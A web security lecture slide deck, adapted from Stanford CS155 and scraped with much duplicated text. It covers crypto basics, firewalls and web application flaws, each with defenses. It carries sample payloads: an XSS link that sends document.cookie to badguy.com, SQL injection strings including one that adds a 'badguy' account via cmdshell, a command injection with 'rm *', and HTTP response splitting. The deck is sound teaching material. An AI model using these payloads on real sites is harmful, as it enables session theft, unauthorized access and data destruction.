2. 1 CS6320 – Web Security L. Grewe Modified from http://crypto.stanford.edu/cs155/

3. 2 Issues Authentication, Authorization Authentication, Authorization Protecting your system against hackers Protecting your system against hackers Controlling access to critical data Controlling access to critical data Control inbound versus outbound traffic Control inbound versus outbound traffic security versus accessibility tradeoffs security versus accessibility tradeoffs security versus capability tradeoffs security versus capability tradeoffs multi-tier versus single-tier solutions multi-tier versus single-tier solutions security versus expense tradeoffs security and capability versus administrative overhead and complexity security versus expense tradeoffs security and capability versus administrative overhead and complexity

4. 3 Solutions Software-based Software-based Hardware-based Hardware-based Freeware versus Commercial Products Freeware versus Commercial Products Use of Security Protocols Use of Security Protocols Cryptography Converting messages to unreadable forms...and back Steganography Hiding the existence of a message

5. 4 One issue….buffer overflow…things getting better Source: MITRE CVE trends Majority of vulnerabilities now found in web software

6. 5 Example Web Site architecture w/ Security Components Intrusion Detection System Application Firewall (WAF) Firewall Load Balancer DB WS 1 WS 2 WS 3 Firewall Authorization App Servers

7. 6 Attacks of systems Common web-site attacks: Common web-site attacks: Denial of ServiceDenial of Service Attack the web server (IIS, Apache) :Attack the web server (IIS, Apache) : e.g. control hijacking: CodeRed, Nimda, … e.g. control hijacking: CodeRed, Nimda, … Solutions: Solutions: Harden web server: stackguard, libsafe, …Harden web server: stackguard, libsafe, … Worm defense:Worm defense: Host based intrusion detection, Host based intrusion detection, Worm signatures generation, shields. Worm signatures generation, shields.

8. 7 Firewalls A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in both hardware and software, or a combination of bothA system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in both hardware and software, or a combination of both IP filtering (packet filtering) IP filtering (packet filtering) = controls access by solely looking at information contained in the IP header of data packets being sent to the server.= controls access by solely looking at information contained in the IP header of data packets being sent to the server. Proxy Servers/Application Firewalls Proxy Servers/Application Firewalls

9. 8 Web Application Firewalls Prevent some attacks such as:Prevent some attacks such as: SQL InjectionSQL Injection Form field tamperingForm field tampering Cookie poisoningCookie poisoning Some examples: ImpervaImperva Kavado InterdoKavado Interdo F5 TrafficShieldF5 TrafficShield Citrix NetScalerCitrix NetScaler CheckPoint Web IntelligenceCheckPoint Web Intelligence

10. 9 Message/Information Hiding Protect some information being sent from client to server and vice-versa. Protect some information being sent from client to server and vice-versa. Through encryption. Through encryption. Some protocols such as SSL (secure socket layer) using encryption to perform “secure” exchange of information. Some protocols such as SSL (secure socket layer) using encryption to perform “secure” exchange of information.

11. 10 Encryption Convert normal, readable data into obscured, unreadable data Hi There!!Encryption Algorithmm/okuGlilkdskuch Hi There!!Encryption Algorithmalieka;wk12938*

12. 11 Decryption Convert obscured, unreadable data into normal, readable data Hi There!! Decryption Algorithm m/okuGlilkdskuch Hi There!! Decryption Algorithm alieka;wk12938*

13. 12 Terminology plaintext - clear readable text ciphertext - unreadable text cipher - algorithm(s) for encryption and decryption Hi There!!Encryption Algorithmalieka;wk12938* Hi There!! Decryption Algorithm alieka;wk12938*

14. 13 Terminology Key -- a secret piece of information that controls how the encryption algorithm works Different keys produce different encrypted results Hi There!!Encryption Algorithm109291ala;dfwij? Key: “Citizen Kane” Hi There!!Encryption Algorithm398jfasd;k2//ad? Key: “Citizen Kano”

15. 14 Symmetric Key Technology Alice wants to send a private/confidential message to Bob Alice computes c=crypt(message,key) Sends c to Bob over unsecured wire Bob computes message=crypt(c,key)

16. 15 Symmetric Key Application Password login Alice sends password to computer to prove identity (authenticity) Problem: Sniffing Solution: Challenge/response

17. 16 Shared Secret Key Shared secret is great... but how do we distribute it?

18. 17 Asymmetric Key Cryptography Instead of one key, have two public key private key Public key known to everyone and a Private or secret key known only to the recipient of the message. When John wants to send a secure message to Jane, he uses Jane's public key to encrypt the message. Jane then uses her private key to decrypt it. Computing private key from public key is very, very difficult (factoring huge number)

19. 18 Asymmetric Encryption Example John: finds Jane.pub (public key) from her website (or she gives it in an email to John) John: computes c = crypt(message, Jane.pub) John: sends c to Jane over unsecured wire Jane: computes message = crypt(c, Jane.priv)

20. 19 Advantages Key distribution not a problem! Anyone can send a message to Jane Only Jane can decrypt!

21. 20 Asymmetric Encryption for Authentication Alice wants to tell Bob the message is really from her! Digital signature Alice computes c = crypt(message, Alice.priv) Alice sends c over unsecured wire Anyone can check that Alice is the sender... by computing message = crypt(c, Alice.pub)

22. 21 Authenticity + Secrecy Alice A.priv A.pub, B.pub,...Bob B.priv Carl & Eve Bad People! “I LUV U”

23. 22 Authenticity + Secrecy Alice A.priv A.pub, B.pub,...Bob B.priv Carl & Eve Bad People! “I LUV U” B.pub

24. 23 Authenticity + Secrecy Alice A.priv A.pub, B.pub,...Bob B.priv Carl & Eve Bad People! “I LUV U” B.pub “This is from A”

25. 24 Authenticity + Secrecy Alice A.priv A.pub, B.pub,...Bob B.priv Carl & Eve Bad People! “I LUV U” B.pub “This is from A” A.priv

26. 25 Authenticity + Secrecy Alice A.priv A.pub, B.pub,...Bob B.priv Carl & Eve Bad People! “I LUV U” B.pub “This is from A” A.priv

27. 26 Authenticity + Secrecy Alice A.priv A.pub, B.pub,...Bob B.priv Carl & Eve Bad People! “I LUV U” B.pub “This is from A” A.priv

28. 27 Another Solution: Digital Certificates Certificate Authority: publishes that a particular identity goes with a particular public key Alice gets certificate (identity public key), signed by CA So if you trust CA, then you can trust the public key

29. 28 SSL…the idea Jane connects to John's server John's server returns certificate (signed by VeriSign), plus something encrypted w/ John.priv Jane can verify certificate is valid Uses public key to decrypt token John authenticated Jane makes one time session key k Encrypts w/ John's public key, sends to John Now, can use symmetric key cryptography

30. 29 Attacks… There are many kinds of attacks that hackers have done There are many kinds of attacks that hackers have done Will mention some more weaknesses here ….but, take a class on security, cryptography, etc. to get into more details. Will mention some more weaknesses here ….but, take a class on security, cryptography, etc. to get into more details.

31. 30 Attack: Denial of Service Make the service unavailable Flood of incoming traffic Use robot to launch DOS on server. Hard to trace identity of attacker. Distributed DOS (DDOS) Take over many machines, launch attack simultaneously from many locations

32. 31 Attack: Buffer Overflow Bad guy sends a huge, over-sized request to a naïvely implemented (aka buggy) program, overflowing the input buffer May overwrite data in memory (and/or) program code May overwrite the return address on the stack of a program in C, so that the procedure call returns somewhere else

33. 32 How To Avoid Buffer Overflow Write code carefully Limit input size; read in small chunks as opposed to reading in whole input Use better languages (e.g. java)

34. 33 Another Problem >>>>>What about all of the web application code??? Runs on web server or app server. Runs on web server or app server. Takes input from web users (via web server)Takes input from web users (via web server) Interacts with the database and 3 rd parties.Interacts with the database and 3 rd parties. Prepares results for users (via web server)Prepares results for users (via web server) Examples: Examples: Shopping carts, home banking, bill pay, tax prep, …Shopping carts, home banking, bill pay, tax prep, … New code written for every web site.New code written for every web site. Written in: Written in: C, PHP, Perl, Python, JSP, ASP, …C, PHP, Perl, Python, JSP, ASP, … Often written with little consideration for security.Often written with little consideration for security.

35. 34 Web Application problems Inadequate validation of user input Inadequate validation of user input Cross site scriptingCross site scripting SQL InjectionSQL Injection HTTP SplittingHTTP Splitting Broken session management Broken session management Can lead to session hijacking and data theftCan lead to session hijacking and data theft Insecure storage Insecure storage Sensitive data stored in the clear.Sensitive data stored in the clear. Prime target for theft – e.g. egghead, Verizon.Prime target for theft – e.g. egghead, Verizon. Note: PCI Data Security Standard (Visa, Mastercard)Note: PCI Data Security Standard (Visa, Mastercard)

36. 35 A simple example Direct use of user input: Direct use of user input: http://victim.com/ copy.php ? name=username copy.php: Problem: Problem: http://victim.com/ copy.php ? name=“a ; rm *” http://victim.com/ copy.php ? name=“a ; rm *” (should be: name=a%20;%20rm%20* ) script namescript input system(“cp temp.dat $name.dat”)

37. 36Redirects EZShopper.com shopping cart (10/2004): http://…/cgi-bin/ loadpage.cgi ? page=url Redirects browser to urlRedirects browser to url Redirects are common on many sites Used to track when user clicks on external linkUsed to track when user clicks on external link EZShopper uses redirect to add HTTP headersEZShopper uses redirect to add HTTP headers Problem: phishing Problem: phishing http://victim.com/cgi-bin/loadpage ? page=phisher.com Link to victim.com puts user at phisher.comLink to victim.com puts user at phisher.com  Local redirects should ensure target URL is local

38. 37 Cross Site Scripting (XSS)

39. 38 The setup User input is echoed into HTML response. User input is echoed into HTML response. Example: search field Example: search field http://victim.com/search.php ? term = applehttp://victim.com/search.php ? term = apple search.php responds with:search.php responds with: Search Results Search Results <BODY> Results for :... Is this exploitable? Is this exploitable?

40. 39 Answer…..Bad input Problem: no validation of input term Problem: no validation of input term Consider link: (properly URL encoded) Consider link: (properly URL encoded) http://victim.com/search.php ? term = window.open( window.open( “http://badguy.com?cookie = ” + document.cookie ) document.cookie ) What if user clicks on this link? What if user clicks on this link? 1.Browser goes to victim.com/search.php 2.Victim.com returns Results for … Results for … 3.Browser executes script: Sends badguy.com cookie for victim.com Sends badguy.com cookie for victim.com

41. 40 What is the problem? Why would user click on such a link? Why would user click on such a link? Phishing email in webmail client (e.g. gmail).Phishing email in webmail client (e.g. gmail). Link in doubleclick banner adLink in doubleclick banner ad … many many ways to fool user into clicking… many many ways to fool user into clicking What if badguy.com gets cookie for victim.com ? What if badguy.com gets cookie for victim.com ? Cookie can include session auth for victim.comCookie can include session auth for victim.com Or other data intended only for victim.com Or other data intended only for victim.com  Violates same origin policy

42. 41 Worse … Attacker can execute arbitrary scripts in browser Attacker can execute arbitrary scripts in browser Can manipulate any DOM component on victim.com Can manipulate any DOM component on victim.com Control links on pageControl links on page Control form fields (e.g. password field) on this page and linked pages.Control form fields (e.g. password field) on this page and linked pages. Example: inject password field that sends password to bad guy. Example: inject password field that sends password to bad guy. Can infect other users: MySpace.com worm. Can infect other users: MySpace.com worm.

43. 42 MySpace.com (Samy worm) Users can post HTML on their pages Users can post HTML on their pages MySpace.com ensures HTML contains noMySpace.com ensures HTML contains no,, onclick,,, onclick, … but can do Javascript within CSS tags:… but can do Javascript within CSS tags: And can hide “javascript” as “java\nscript” With careful javascript hacking: With careful javascript hacking: Samy’s worm: infects anyone who visits an infected MySpace page … and adds Samy as a friend.Samy’s worm: infects anyone who visits an infected MySpace page … and adds Samy as a friend. Samy had millions of friends within 24 hours.Samy had millions of friends within 24 hours. More info: http://namb.la/popular/tech.html More info: http://namb.la/popular/tech.html

44. 43 Avoiding XSS bugs (PHP) Main problem: Main problem: Input checking is difficult --- many ways to inject scripts into HTML.Input checking is difficult --- many ways to inject scripts into HTML. Preprocess input from user before echoing it Preprocess input from user before echoing it PHP: htmlspecialchars(string) PHP: htmlspecialchars(string) &  & "  " '  '  > htmlspecialchars( " Test ", ENT_QUOTES);htmlspecialchars( " Test ", ENT_QUOTES); Outputs: <a href='test'>Test</a>

45. 44 httpOnly Cookies (IE) Browser Server GET … HTTP Header: Set-cookie:NAME=VALUE ; HttpOnly Cookie sent over HTTP(s), but not accessible to scripts cannot be read via document.cookie Helps prevent cookie theft via XSS … but does not stop most other risks of XSS bugs.

46. 45 SQL Injection

47. 46 The setup User input is used in SQL query User input is used in SQL query Example: login page (in ASP) Example: login page (in ASP) set ok = execute(“SELECT * FROM UserTable WHERE username=′ ” & form(“user”) & WHERE username=′ ” & form(“user”) & “ ′ AND password=′ ” & form(“pwd”) & “ ′ ” ); “ ′ AND password=′ ” & form(“pwd”) & “ ′ ” ); If not ok.EOF login success else fail; Is this a problem? Is this a problem?

48. 47 The problem …..Bad input Suppose user = “ ′ or 1 = 1 -- ” (URL encoded) Suppose user = “ ′ or 1 = 1 -- ” (URL encoded) Then scripts does: Then scripts does: ok = execute( SELECT … WHERE username= ′ ′ or 1=1 -- … ) The “--” causes rest of line to be ignored.The “--” causes rest of line to be ignored. Now ok.EOF is always false.Now ok.EOF is always false. The bad news: easy login to many sites this way. The bad news: easy login to many sites this way.

49. 48 Worse… Suppose user = Suppose user = ′ exec cmdshell ′ exec cmdshell ′ net user badguy badpwd ′ / ADD -- Then script does: Then script does: ok = execute( SELECT … WHERE username= ′ ′ exec … ) If SQL server context runs as “ sa ”, attacker gets account on DB server.

50. 49 Avoiding SQL injection Build SQL queries by properly escaping args: ′  \′ Build SQL queries by properly escaping args: ′  \′ Example: Parameterized SQL: (ASP.NET 1.1) Example: Parameterized SQL: (ASP.NET 1.1) Ensures SQL arguments are properly escaped.Ensures SQL arguments are properly escaped. SqlCommand cmd = new SqlCommand( "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd", dbConnection); cmd.Parameters.Add("@User", Request[“user”] ); cmd.Parameters.Add("@Pwd", Request[“pwd”] ); cmd.ExecuteReader(); In PHP: bound parameters -- similar function In PHP: bound parameters -- similar function

51. 50 HTTP Response Splitting

52. 51 The setup User input echoed in HTTP header. User input echoed in HTTP header. Example: Language redirect page (JSP) Example: Language redirect page (JSP) Browser sends http://.../by_lang.jsp ? lang=french Browser sends http://.../by_lang.jsp ? lang=french Server HTTP Response: HTTP/1.1 302 (redirect) Date: … Location: /by_lang.jsp ? lang=french Is this a problem? Is this a problem?

53. 52 The Problem ….Bad input Suppose browser sends: Suppose browser sends: http://.../by_lang.jsp ? lang= “ french \n “ french \n Content-length: 0 \r\n\r\n HTTP/1.1 200 OK HTTP/1.1 200 OK Spoofed page ” (URL encoded) Spoofed page ” (URL encoded)

54. 53 Bad input HTTP response from server looks like: HTTP response from server looks like: HTTP/1.1 302 (redirect) Date: … Location: /by_lang.jsp ? lang= french Content-length: 0 HTTP/1.1 200 OK Content-length: 217 Spoofed page lang

55. 54 So what? What just happened: What just happened: Attacker submitted bad URL to victim.comAttacker submitted bad URL to victim.com URL contained spoofed page in it URL contained spoofed page in it Got back spoofed pageGot back spoofed page So what? So what? Cache servers along path now store spoof of victim.comCache servers along path now store spoof of victim.com Will fool any user using same cache serverWill fool any user using same cache server Defense: don’t do that. Defense: don’t do that.

56. 55 App code Little programming knowledge can be dangerous: Little programming knowledge can be dangerous: Cross site scriptingCross site scripting SQL InjectionSQL Injection HTTP SplittingHTTP Splitting What to do? What to do? Band-aid: Web App Firewall (WAF)Band-aid: Web App Firewall (WAF) Looks for attack patterns and blocks requests Looks for attack patterns and blocks requests False positive / false negatives False positive / false negatives Code checkingCode checking

57. 56 Code checking Blackbox security testing services: Blackbox security testing services: Whitehatsec.comWhitehatsec.com Automated blackbox testing tools: Automated blackbox testing tools: Cenzic, HailstormCenzic, Hailstorm Spidynamic, WebInspectSpidynamic, WebInspect eEye, RetinaeEye, Retina Web application hardening tools: Web application hardening tools: WebSSARI [WWW’04] : based on information flowWebSSARI [WWW’04] : based on information flow Nguyen-Tuong [IFIP’05] : based on taintingNguyen-Tuong [IFIP’05] : based on tainting

58. 57 Session Management Cookies, hidden fields, and user authentication

59. 58 Cookie risks Danger of storing data on browser Danger of storing data on browser User can change valuesUser can change values Silly example: Shopping cart software. Silly example: Shopping cart software. Set-cookie:shopping-cart-total = 150 ($) User edits cookie file (cookie poisoning):User edits cookie file (cookie poisoning): Cookie:shopping-cart-total = 15 ($) … bargain shopping.… bargain shopping. Similar behavior with hidden fields: Similar behavior with hidden fields:

60. 59 Not so silly …some real sites had this issue D3.COM Pty Ltd: ShopFactory 5.8 D3.COM Pty Ltd: ShopFactory 5.8 @Retail Corporation: @Retail @Retail Corporation: @Retail Adgrafix: Check It Out Adgrafix: Check It Out Baron Consulting Group: WebSite Tool Baron Consulting Group: WebSite Tool ComCity Corporation: SalesCart ComCity Corporation: SalesCart Crested Butte Software: EasyCart Crested Butte Software: EasyCart Dansie.net: Dansie Shopping Cart Dansie.net: Dansie Shopping Cart Intelligent Vending Systems: Intellivend Intelligent Vending Systems: Intellivend Make-a-Store: Make-a-Store OrderPage Make-a-Store: Make-a-Store OrderPage McMurtrey/Whitaker & Associates: Cart32 3.0 McMurtrey/Whitaker & Associates: Cart32 3.0 pknutsen@nethut.no: CartMan 1.04 pknutsen@nethut.no: CartMan 1.04 Rich Media Technologies: JustAddCommerce 5.0 Rich Media Technologies: JustAddCommerce 5.0 SmartCart: SmartCart SmartCart: SmartCart Web Express: Shoptron 1.2 Web Express: Shoptron 1.2

61. 60Solution When storing state on browser MAC data using server secret key. When storing state on browser MAC data using server secret key..NET 2.0:.NET 2.0: System.Web.Configuration.MachineKeySystem.Web.Configuration.MachineKey Secret web server key intended for cookie protection Secret web server key intended for cookie protection HttpCookie cookie = new HttpCookie(name, val); HttpCookie encodedCookie = HttpSecureCookie.Encode (cookie);HttpCookie cookie = new HttpCookie(name, val); HttpCookie encodedCookie = HttpSecureCookie.Encode (cookie); HttpSecureCookie.Decode (cookie);HttpSecureCookie.Decode (cookie);

62. 61 Cookie authentication Browser Web ServerAuth server POST login.cgi Username & pwd Validate user auth=val Store val Set-cookie: auth=val GET restricted.html Cookie: auth=val restricted.html auth=val YES/NOIf YES, restricted.html Check val

63. 62 Weak authenticators: security risk Predictable cookie authenticator Predictable cookie authenticator Verizon Wireless - counterVerizon Wireless - counter Valid user logs in, gets counter, can view sessions of other users.Valid user logs in, gets counter, can view sessions of other users. Weak authenticator generation: [Fu et al. ’01] Weak authenticator generation: [Fu et al. ’01] WSJ.com:cookie = {user, MAC k (user) }WSJ.com:cookie = {user, MAC k (user) } Weak MAC exposes K from few cookies.Weak MAC exposes K from few cookies. Apache Tomcat: generateSessionID() Apache Tomcat: generateSessionID() MD5(PRNG) … but weak PRNG [GM’05].MD5(PRNG) … but weak PRNG [GM’05]. Predictable SessionID’sPredictable SessionID’s